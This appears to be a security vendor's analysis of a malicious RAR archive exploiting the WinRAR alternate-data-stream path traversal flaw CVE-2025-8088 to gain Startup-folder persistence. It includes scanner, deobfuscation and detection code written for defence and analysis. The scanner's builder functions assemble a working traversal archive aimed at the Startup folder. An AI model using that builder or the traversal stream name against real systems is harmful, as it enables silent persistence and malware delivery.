
Lazarus Group (APT38 / APT-C-26) Exploits WinRAR Vulnerability CVE-2025-8088 for Archive Poisoning Attacks

Posted on: 18 Dec 2025 | Author: Foresiet

During routine threat research and monitoring of Chinese-language underground distribution channels, our team identified a malicious RAR archive. The archive abuses CVE-2025-8088, a path traversal vulnerability in WinRAR, to achieve an arbitrary file write and persistence on Windows systems.

To accomplish this, the archive combines an NTFS Alternate Data Stream (ADS) entry with directory traversal in the stream name. That is enough to drop a malicious batch script directly into the user's Windows Startup directory. When a user extracts the archive with a vulnerable WinRAR version (7.12 or earlier), the payload is staged for automatic execution and runs silently at the next user logon. Archives built this way are commonly used to distribute malware loaders, credential stealers, and initial access tooling.

While we do not claim direct attribution, the techniques observed in this campaign—particularly the abuse of archive parsing logic and multi-stage loaders—overlap with tradecraft previously seen in Lazarus-linked operations and other advanced persistent threat (APT) campaigns. Therefore, this blog documents the archive structure, vulnerability mechanics, and payload behavior, while also providing evidence of the patched behavior in newer WinRAR versions.

Archive Structure Overview

At first glance, the archive appears benign. It contains multiple small text files named sequentially:

(Screenshot: archive listing showing the sequentially named text files)

Alongside these decoy files, the archive also contains numerous Python scripts (bot*.py), which are not immediately executed during extraction but are used later in the infection chain.

Key observation:

The malicious behavior does not rely on visible filenames. Instead, it is embedded in NTFS Alternate Data Streams attached to the text files.


Abuse of NTFS Alternate Data Streams (ADS)

Using 010 Editor with a RAR structure template, we identified multiple “Service (NTFS streams) block” entries associated with the text files.

One critical block contains the following properties:

  • Name: STM
  • Type: NTFS Alternate Data Stream
  • DataSize: 642 bytes

WinRAR treats a service block named STM specially: instead of creating a standalone file, it writes the block's data as an alternate data stream attached to the preceding file entry, using the stream name stored in the block. That stored name is attacker-controlled input.

Directory Traversal via ADS Payload

Inspection of the ADS data reveals a crafted stream name containing a relative traversal path, rather than a valid ADS identifier:

(Screenshot: STM block whose stream name contains a relative traversal path)

This violates NTFS ADS naming rules: the portion after the colon is meant to be a plain stream name (for example :Zone.Identifier), not a filesystem path.

However, WinRAR 7.12 and earlier do not validate this name before using it.

As a result, during extraction:

  1. WinRAR concatenates the path of the extracted file with the ADS name taken from the archive.
  2. The ..\ components in that name escape the extraction directory.
  3. The stream data is written as a file named 1.bat directly into the user's Startup folder.
(Screenshot: RAR archive containing an NTFS Alternate Data Stream identified by the STM service name)
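To make the mechanics above concrete, here is an added example, written for this page and not code from the sample, from WinRAR or from unrar. It parses the RAR5 header chain, pulls the stream name out of each STM service block's subdata record, and applies the check a safe extractor needs: a valid ADS name is a colon followed by a plain name, never a path. The same check is what the later recommendation to flag ADS usage combined with traversal patterns amounts to when scanning archives statically. The archive it scans is constructed in memory by the builder functions at the bottom; the traversal string in it is illustrative, modelled on the description of the sample rather than copied from Pharos.rar, and the file names and data are invented.

```python
import zlib

RAR5_SIG = b"Rar!\x1a\x07\x01\x00"                 # RAR 5.0 signature
HEAD_MAIN, HEAD_FILE, HEAD_SERVICE, HEAD_END = 1, 2, 3, 5
HFL_EXTRA, HFL_DATA, HFL_CHILD = 0x01, 0x02, 0x20  # header flags: extra area, data area, depends on preceding file
FFL_MTIME, FFL_CRC = 0x02, 0x04                    # file flags: mtime / data CRC32 fields present
FHEXTRA_SUBDATA = 0x07                             # extra record carrying service data (the ADS name for STM)

def vint_encode(n):  # 7 bits per byte, low bits first, high bit set on all but the last byte
    out = bytearray()
    while n > 0x7F:
        out.append((n & 0x7F) | 0x80)
        n >>= 7
    return bytes(out) + bytes([n])

def vint_decode(buf, pos):
    n = shift = 0
    while True:
        b, pos = buf[pos], pos + 1
        n |= (b & 0x7F) << shift
        if not b & 0x80:
            return n, pos
        shift += 7

def _header(body):  # size vint + body, prefixed by the CRC32 that covers both
    hdr = vint_encode(len(body)) + body
    return zlib.crc32(hdr).to_bytes(4, "little") + hdr

def build_entry(htype, name, data=b"", extra=b""):  # file (type 2) or service (type 3) header + stored data
    flags = (HFL_EXTRA if extra else 0) | (HFL_DATA if data else 0) | (HFL_CHILD if htype == HEAD_SERVICE else 0)
    body = vint_encode(htype) + vint_encode(flags)
    body += (vint_encode(len(extra)) if extra else b"") + (vint_encode(len(data)) if data else b"")
    body += vint_encode(0) + vint_encode(len(data)) + vint_encode(0x20)  # file flags, unpacked size, attributes
    body += vint_encode(0) + vint_encode(0)                              # compression info (store), host OS (Windows)
    return _header(body + vint_encode(len(name)) + name + extra) + data

def stm_extra(stream_name):  # FHEXTRA_SUBDATA record holding the ADS name, as WinRAR stores it for STM blocks
    rec = vint_encode(FHEXTRA_SUBDATA) + stream_name.encode("utf-8")
    return vint_encode(len(rec)) + rec

def subdata(extra):  # payload of the first FHEXTRA_SUBDATA record in an extra area, or None
    p = 0
    while p < len(extra):
        rsize, p = vint_decode(extra, p)
        rtype, q = vint_decode(extra, p)
        if rtype == FHEXTRA_SUBDATA:
            return extra[q:p + rsize].decode("utf-8", "replace")
        p += rsize
    return None

def classify_stream_name(stream):  # a valid ADS name is ':' plus a plain name; separators or '..' make it a path
    if stream is None or not stream.startswith(":"):
        return "malformed"
    return "traversal" if any(tok in stream[1:] for tok in ("\\", "/", "..")) else "ok"

def scan_ads_streams(blob):
    """Walk the RAR5 header chain; report each STM block as (owning file, stream name, verdict)."""
    if not blob.startswith(RAR5_SIG):
        raise ValueError("not a RAR5 archive")
    pos, owner, findings = len(RAR5_SIG), None, []
    while pos + 4 < len(blob):
        crc = int.from_bytes(blob[pos:pos + 4], "little")
        size, p = vint_decode(blob, pos + 4)
        hdr_end = p + size
        if zlib.crc32(blob[pos + 4:hdr_end]) != crc:
            raise ValueError(f"header CRC mismatch at offset {pos}")
        htype, p = vint_decode(blob, p)
        hflags, p = vint_decode(blob, p)
        extra_size, p = vint_decode(blob, p) if hflags & HFL_EXTRA else (0, p)
        data_size, p = vint_decode(blob, p) if hflags & HFL_DATA else (0, p)
        if htype in (HEAD_FILE, HEAD_SERVICE):
            fflags, p = vint_decode(blob, p)
            for _ in range(2):                           # unpacked size, attributes
                _, p = vint_decode(blob, p)
            p += (4 if fflags & FFL_MTIME else 0) + (4 if fflags & FFL_CRC else 0)
            for _ in range(2):                           # compression info, host OS
                _, p = vint_decode(blob, p)
            nlen, p = vint_decode(blob, p)
            name = blob[p:p + nlen].decode("utf-8", "replace")
            if htype == HEAD_FILE:
                owner = name                             # an STM block attaches to the preceding file entry
            elif name == "STM":
                stream = subdata(blob[hdr_end - extra_size:hdr_end])
                findings.append((owner, stream, classify_stream_name(stream)))
        pos = hdr_end + data_size                        # the data area, if any, follows the header
    return findings

# Constructed archive mirroring the structure described above; the traversal string is illustrative, not from Pharos.rar.
TRAVERSAL_ADS = r":..\..\..\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1.bat"

def build_sample_archive():
    return (RAR5_SIG
            + _header(vint_encode(HEAD_MAIN) + vint_encode(0) + vint_encode(0))   # main header, archive flags 0
            + build_entry(HEAD_FILE, b"1.txt", b"decoy\r\n")
            + build_entry(HEAD_SERVICE, b"STM", b"@echo off\r\n", stm_extra(TRAVERSAL_ADS))
            + build_entry(HEAD_FILE, b"2.txt", b"decoy\r\n")
            + build_entry(HEAD_SERVICE, b"STM", b"[ZoneTransfer]\r\nZoneId=3\r\n", stm_extra(":Zone.Identifier"))
            + _header(vint_encode(HEAD_END) + vint_encode(0) + vint_encode(0)))   # end header, end flags 0
```

Running `scan_ads_streams(build_sample_archive())` reports the first STM block as `traversal` and the second, an ordinary Zone.Identifier mark-of-the-web stream, as `ok`; on a real archive, pass the file's bytes to `scan_ads_streams` and treat any `traversal` or `malformed` verdict as a reason not to extract with a pre-7.13 build. The header CRC check is deliberate: a scanner that silently skips corrupt headers can be steered past the block that matters.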

Persistence via Startup Folder Write

Runtime monitoring confirms the impact of this flaw.

Using process and filesystem monitoring, we observed WinRAR issuing file creation operations targeting:

(Screenshot: WinRAR file creation operation targeting the user's Startup folder)

Any executable or script placed in this directory is automatically executed when the user logs in, providing persistent execution without further user interaction.

This confirms that simply extracting the archive on a vulnerable WinRAR version is sufficient to establish persistence.

Payload Execution & Social Engineering

Upon execution, the dropped 1.bat script displays a fake Windows Defender update warning to the user, instructing them to temporarily disable antivirus protection and restart the system.

This message is implemented using a PowerShell-based message box and serves as a social engineering technique to reduce detection during subsequent payload execution.

(Screenshot: Fake Windows Defender update popup)

The batch script then proceeds to download and execute additional payload components, including a Python-based loader.

This stage represents post-exploitation behavior and is separate from the WinRAR vulnerability itself.

Secondary Payload Overview

The downloaded Python loader performs the following high-level actions:

  • Checks for the presence of a Python runtime
  • Installs Python if missing
  • Writes additional scripts to persistence locations
  • Deploys further malware components (e.g., stealer / injector modules)

The loader employs multi-layer obfuscation, including:

  • String reversal
  • Base64 decoding
  • Zlib decompression

A detailed analysis of these components is outside the scope of this report and may be covered separately.
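As an added example, not the loader's own code, the following shows how an analyst can strip the three layers named above without knowing in advance which order the author applied them: each candidate transform is accepted only if its output looks like another layer (a zlib header, base64 text) or like Python source, possibly still reversed. The loader stub it decodes, and the two `obfuscate` helpers that wrap it, are constructed for illustration and are not extracted from stub.pyw or the bot*.py scripts.

```python
import base64
import re
import zlib

B64_RE = re.compile(rb"[A-Za-z0-9+/]+={0,2}")
PY_HINT = re.compile(rb"^\s*(import|from|def|exec|print)\b", re.M)

def is_zlib(b):  # RFC 1950 header: CMF 0x78 (deflate, 32 KiB window) and CMF*256+FLG divisible by 31
    return len(b) >= 2 and b[0] == 0x78 and (b[0] * 256 + b[1]) % 31 == 0

def is_python(b):
    # A bare base64 token such as b"eJxLyk" compiles as an identifier, so also require a statement keyword.
    if not PY_HINT.search(b):
        return False
    try:
        compile(b, "<payload>", "exec")
        return True
    except (SyntaxError, ValueError):
        return False

def plausible(b):  # does a transform's output look like another layer, or like the script (maybe still reversed)?
    return is_python(b) or is_zlib(b) or B64_RE.fullmatch(b) is not None or is_python(b[::-1]) or is_zlib(b[::-1])

TRANSFORMS = (
    ("zlib", zlib.decompress),
    ("base64", lambda b: base64.b64decode(b, validate=True)),
    ("reverse", lambda b: b[::-1]),
)

def peel(blob, max_layers=12):
    """Undo reversal / base64 / zlib layers in whatever order they were applied.
    Returns (python_source, [layer names removed, outermost first])."""
    cur, layers = blob.strip(), []
    for _ in range(max_layers):
        if is_python(cur):
            return cur.decode("utf-8"), layers
        for name, fn in TRANSFORMS:
            if name == "reverse" and layers[-1:] == ["reverse"]:
                continue                      # reversing twice in a row only undoes itself
            try:
                nxt = fn(cur)
            except Exception:                 # zlib.error / binascii.Error: not this layer
                continue
            if plausible(nxt):
                cur, layers = nxt, layers + [name]
                break
        else:
            break
    raise ValueError(f"no Python source reached after layers {layers}")

# Constructed loader stub standing in for the page's stub.pyw / bot*.py; not the real sample.
SAMPLE_SOURCE = b"import os\nprint('stage-2 loader would run from', os.getcwd())\n"

def obfuscate(source):  # the layering as the text lists it, applied in reverse: zlib, then base64, then reverse
    return base64.b64encode(zlib.compress(source))[::-1]

def obfuscate_alt(source):  # same three layers in a different order: reverse, then base64, then zlib
    return zlib.compress(base64.b64encode(source[::-1]))
```

`peel(obfuscate(SAMPLE_SOURCE))` returns the stub with the trace `["reverse", "base64", "zlib"]`, and `peel(obfuscate_alt(SAMPLE_SOURCE))` recovers the same stub with `["zlib", "base64", "reverse"]`. The keyword gate in `is_python` matters: `compile` happily accepts a lone base64 token as an expression statement, so without it the peeler would stop one layer early.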

Patch Behavior and Mitigation Validation

When attempting to extract the same archive using a patched WinRAR version (≥ 7.13), the exploit fails.

WinRAR displays repeated diagnostic errors such as:

The filename, directory name, or volume label syntax is incorrect.

No files are written outside the extraction directory, and no Startup persistence is achieved.

This behavior is consistent with WinRAR 7.13 rejecting ADS names that contain path separators or traversal sequences, which closes this attack vector.

Detection and Defensive Recommendations

Immediate Mitigations

  • Update WinRAR to version 7.13 or later. The fix also applies to the Windows command-line RAR and UnRAR tools and to UnRAR.dll, so update those alongside the GUI.
  • Avoid extracting archives from untrusted sources

Detection Opportunities

  • Monitor file creation events in %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup and in the all-users folder %ProgramData%\Microsoft\Windows\Start Menu\Programs\StartUp, especially where the creating process is an archive extractor

  • Alert on archive extraction processes creating files outside the chosen extraction directory
  • Flag NTFS ADS usage combined with traversal patterns (..\)
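The first two bullets as rules in code, added here as an example and not part of the original post. It runs over constructed records carrying Sysmon Event ID 11 (FileCreate) field names; they are not telemetry from this incident, and the process IDs, user names and paths are invented. The extraction directory is inferred from the archiver process's first write, which is an assumption made for the example: in production, take it from the extraction command line or dialog instead.

```python
import re

ARCHIVERS = {"winrar.exe", "rar.exe", "unrar.exe", "7z.exe", "7zg.exe", "7zfm.exe"}
# Tail shared by the per-user (%APPDATA%) and all-users (%ProgramData%) Startup folders.
STARTUP_RE = re.compile(r"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", re.IGNORECASE)

def parent_dir(path):
    return path.rsplit("\\", 1)[0].lower() + "\\"

def detect_extraction_escapes(events):
    """Rules over Sysmon Event ID 11 (FileCreate) records from an archiver process:
    startup_write           - the file lands in a Startup folder
    outside_extraction_dir  - the file lands outside the directory of the process's first write
                              (assumption: that first write marks the chosen extraction directory)"""
    alerts, roots = [], {}
    for ev in events:
        if ev["EventID"] != 11 or ev["Image"].rsplit("\\", 1)[-1].lower() not in ARCHIVERS:
            continue
        pid, target = ev["ProcessId"], ev["TargetFilename"]
        if STARTUP_RE.search(target):
            alerts.append(("startup_write", pid, target))
        root = roots.setdefault(pid, parent_dir(target))
        if not target.lower().startswith(root):
            alerts.append(("outside_extraction_dir", pid, target))
    return alerts

# Constructed records with Sysmon Event ID 11 field names; not telemetry from the incident.
STARTUP_HIT = r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1.bat"
SAMPLE_EVENTS = [
    {"EventID": 11, "ProcessId": 4120, "Image": r"C:\Program Files\WinRAR\WinRAR.exe",
     "TargetFilename": r"C:\Users\alice\Downloads\Pharos\1.txt"},
    {"EventID": 11, "ProcessId": 4120, "Image": r"C:\Program Files\WinRAR\WinRAR.exe",
     "TargetFilename": STARTUP_HIT},
    {"EventID": 11, "ProcessId": 1204, "Image": r"C:\Windows\explorer.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Notes.lnk"},
    {"EventID": 11, "ProcessId": 5008, "Image": r"C:\Program Files\7-Zip\7zG.exe",
     "TargetFilename": r"C:\Users\bob\Desktop\out\bot1.py"},
]
```

On the sample, only the WinRAR write to the Startup folder fires, and it fires both rules at once; the Explorer write to Startup is ignored because a user creating a shortcut there is normal, and the 7-Zip write stays inside its own extraction directory. A single process tripping both rules on the same path is the signature of this exploit rather than of an unlucky user.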

Appendix: Indicators of Compromise

  • MD5: faa9dec02bad43b1af68a4194dea8762 (Pharos.rar)
  • MD5: 273af5e2e0130baee7d3b55081be5ad5 (stub.pyw)
  • MD5: 41df3b66ebcfb6e4d4d581d678299041 (Tsunami-Installer)
  • Mutex: il9MGMxYXWAeXxAm

Conclusion

This case demonstrates how legacy filesystem features, when combined with insufficient input validation, can be abused to create reliable persistence mechanisms using nothing more than a crafted archive file.

By leveraging NTFS Alternate Data Streams and directory traversal, attackers were able to convert a simple archive extraction into a full persistence event—without exploiting memory corruption or requiring elevated privileges.

The issue has since been addressed in newer WinRAR versions, but the technique highlights the ongoing risk posed by complex file format parsers and underscores the importance of keeping widely used utilities up to date.
